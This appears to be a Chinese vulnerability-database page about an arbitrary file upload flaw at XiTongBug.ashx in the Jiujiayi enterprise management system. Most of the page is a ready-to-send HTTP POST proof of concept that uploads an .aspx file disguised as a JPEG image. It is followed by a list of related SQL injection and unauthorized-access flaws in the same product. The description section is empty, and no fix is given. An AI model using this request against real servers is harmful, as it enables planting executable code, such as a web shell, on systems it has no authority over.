九佳易 XiTongBug.ashx 文件上传漏洞

漏洞描述

PoC代码

POST /XiTongBug.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.14
Content-Length: 411
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/jpeg

1
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

相关漏洞推荐

• 九佳易时尚企业管理系统 /log.aspx 未授权访问漏洞
• 九佳易 /Service/Ajax_XT.ashx SQL 注入漏洞
• 西安九佳易信息资讯有限公司时尚企业管理系统 PicShow.aspx SQL注入漏洞
• 西安九佳易信息资讯有限公司时尚企业管理系统 OpenSheet.aspx SQL注入漏洞
• 西安九佳易信息资讯有限公司时尚企业管理系统日志页面未授权访问漏洞
• 西安九佳易信息资讯有限公司时尚企业管理系统SQL注入漏洞
• 九佳易管理系统 XiTongBug.ashx 存在任意文件上传漏洞